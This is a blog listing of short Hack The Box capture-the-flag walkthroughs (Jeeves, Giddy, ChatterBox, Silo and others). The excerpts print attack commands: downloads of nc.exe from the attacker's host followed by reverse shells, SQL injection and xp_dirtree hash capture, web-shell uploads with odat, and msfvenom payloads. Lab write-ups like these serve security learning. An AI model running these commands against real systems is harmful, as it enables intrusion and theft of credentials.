Category: Writeups

nmap Port 8500 – ColdFusion ColdFusion File Inclusion https://www.exploit-db.com/exploits/14641 Hash Crack JSP Shell Creation & File Upload & Shell Run the task and open the file on the following directory C:\ColdFusion8\wwwroot\CFIDE\shell.jsp Privilege escalation Python exploit suggester Upload ms10-059.exe (Chimchurri) via Powershell Get an admin shell with exe file .

nmap Anonymous FTP PRTG Files are under C:\ProgramData\Paessler\PRTG Network Manager Looking for password The version of PRTG is vulnerable Use the following exploit: https://raw.githubusercontent.com/wildkindcc/CVE-2018-9276/master/CVE-2018-9276.py I got NT Authority\System

nmap WPScan – enumerate users WPScan – Plugin Vulnerability (IDOR) found https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/ As the PoC explained in the above URL, I tried to upload CV files first Since wp saves the uploaded files as /wp-content/uplaods/{year}/{month}/{file name} I checked if the I uploaded exist, and yes it’s uploaded Also in HTML code of application page, I… Continue reading HTB – Tenten Walkthrough

nmap gobuster Jenkins  Code Execution Create a project on Jenkins Low Privileged Shell Enter commands under Build Section Powershell wget “http://10.10.14.4:8000/nc.exe” -outfile “nc.exe” Nc.exe 10.10.14.4 7777 -e cmd.exe And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell Meterpreter Shell Create a… Continue reading HTB – Jeeves Walkthrough

nmap  gobuster Search field – SQL error SQL InjectionYou can use the cheatsheet of PentestMonkeyhttp://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheetor you can use sqlmapsqlmap –url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 –dbms=mssql –dbs databases  current usersqlmap –url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 –dbms=mssql –current-user Capture MSSQL credentials with xp_dirtree, smbserver.pyFollowing blogspost explains the process very goodhttps://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478=1; EXEC MASTER.sys.xp_dirtree ‘\\yourIP\something’ listen with responder to steal the user hashresponder -I tun0… Continue reading HTB – Giddy Walkthrough

nmap Exploit Create a shell with msfvenom as described in the exploit Get the exploit from searchsploit or exploitdb  Shell Privilege Escalation reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” (New-Object System.Net.WebClient).DownloadFile(‘http://10.10.14.16:8000/nc.exe’,’C:\Users\Alfred\Desktop\nc.exe’)$username = ‘administrator’$password = ‘Welcome1!’$securePassword = ConvertTo-SecureString $password -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential $username, $securePasswordStart-Process C:\Users\Alfred\Desktop\nc.exe -ArgumentList ‘-e cmd.exe 10.10.14.16 1234’ -Credential $credential  And we get an admin… Continue reading HTB – ChatterBox Walkthrough

Nmap SMB Shares Get the file and unzip it SQL credentials found in vbaProject.bin Use Impacket’s mssqlclient scipt to login Try to enable xm_cmdshell but the current user is not privileged Try to steal credentials by calling a fake share on your own server Listen with responder Crack the hash with john Login again as… Continue reading HTB – Querier Walkthrough

Enumeration nmap SID Enumeration Password Guesser – odat Uploading aspx shell for command inejction ./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger –putFile ‘C:\inetpub\wwwroot\’ ‘shell.aspx’ /usr/share/webshells/aspx/cmdasp.aspx –sysdba Reverse Shell Or create msfvenom payload for reverse shellmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > lisa.aspx Upload the file./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U… Continue reading HTB: Silo